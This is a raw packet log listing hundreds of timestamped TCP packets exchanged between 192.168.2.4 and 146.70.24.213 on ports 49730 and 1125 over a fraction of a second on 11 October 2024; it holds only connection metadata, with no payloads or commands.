Oct 11, 2024 16:53:47.514211893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514228106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514235973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514250994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514266968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514271021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514281988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514297009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514302015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514311075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514326096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514332056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514339924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514353991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514362097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514383078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514384985 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514400005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514414072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514429092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514436007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514444113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514458895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514465094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514475107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514491081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514496088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514506102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514520884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514528990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514537096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514552116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514558077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514589071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.599936962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.599982977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600013971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600070953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600079060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600095987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600104094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600116968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600132942 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600176096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600253105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600287914 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600327969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600419044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600434065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600461960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600526094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600541115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600564003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600569010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600583076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600598097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600606918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600610971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600625992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600630999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600641012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600656033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600663900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600671053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600689888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600691080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600707054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600733995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600815058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600830078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600845098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600853920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600858927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600873947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600873947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.600892067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.600914001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603600979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603621960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603655100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603676081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603713036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603760958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603774071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603806973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603833914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603849888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603899002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603925943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603940010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603955030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603980064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.603981018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.603993893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604015112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604034901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604079962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604106903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604247093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604286909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604403019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604531050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604545116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604581118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604593039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604612112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604628086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604629993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604643106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604669094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604670048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604712963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604722023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604793072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604834080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604851961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604890108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604902983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604931116 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.604983091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.604998112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605011940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605022907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605026960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605045080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605062962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605077982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605092049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605104923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605104923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605120897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605128050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605135918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605159044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605159998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605175018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605189085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605202913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605206966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605216980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605232000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605258942 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605276108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605290890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605304956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605345011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605462074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605475903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605490923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605503082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605506897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605518103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605530024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605535030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605549097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605556965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605565071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605591059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605601072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605604887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605627060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605633020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605643034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605655909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605664968 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605669975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605695963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605710030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605724096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605746031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605748892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605761051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605776072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605789900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605799913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605814934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605822086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605834007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605849028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605863094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605866909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605876923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605890989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605894089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605906963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.605926037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605957031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.605988979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606003046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606046915 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606089115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606103897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606117964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606142044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606209040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606223106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606236935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606249094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606251955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606268883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606271029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606292963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606307030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606312990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606321096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606336117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606347084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606349945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606367111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606374979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606404066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606589079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606604099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606616974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606631041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606645107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606646061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606658936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.606669903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.606702089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690499067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690527916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690542936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690618038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690632105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690646887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690660000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690682888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690697908 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690704107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690718889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690733910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690747976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690757990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690774918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690792084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690797091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690812111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690854073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690882921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690918922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690932989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690957069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.690959930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.690999031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.691045046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691174984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691195965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691224098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.691252947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691267014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691282034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691296101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.691323996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.691359043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691373110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691399097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691415071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.691415071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.691462040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.694716930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694761992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694776058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694803953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.694937944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694967985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694983006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694996119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.694998026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695012093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695022106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695025921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695043087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695053101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695056915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695071936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695080042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695085049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695101023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695108891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695113897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695122004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695128918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695137024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695193052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.695957899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695971966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.695986986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696022034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696053982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696068048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696080923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696094990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696099043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696110964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696124077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696125984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696152925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696156025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696203947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696274996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696290970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696305990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696320057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696329117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696333885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696348906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696367979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696369886 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696386099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696391106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696405888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696419001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696433067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696439028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696448088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696463108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696465969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696476936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696491003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696494102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696506023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696520090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696532011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.696542978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.696542978 CEST	49730	1125	192.168.2.4	146.70.24.213
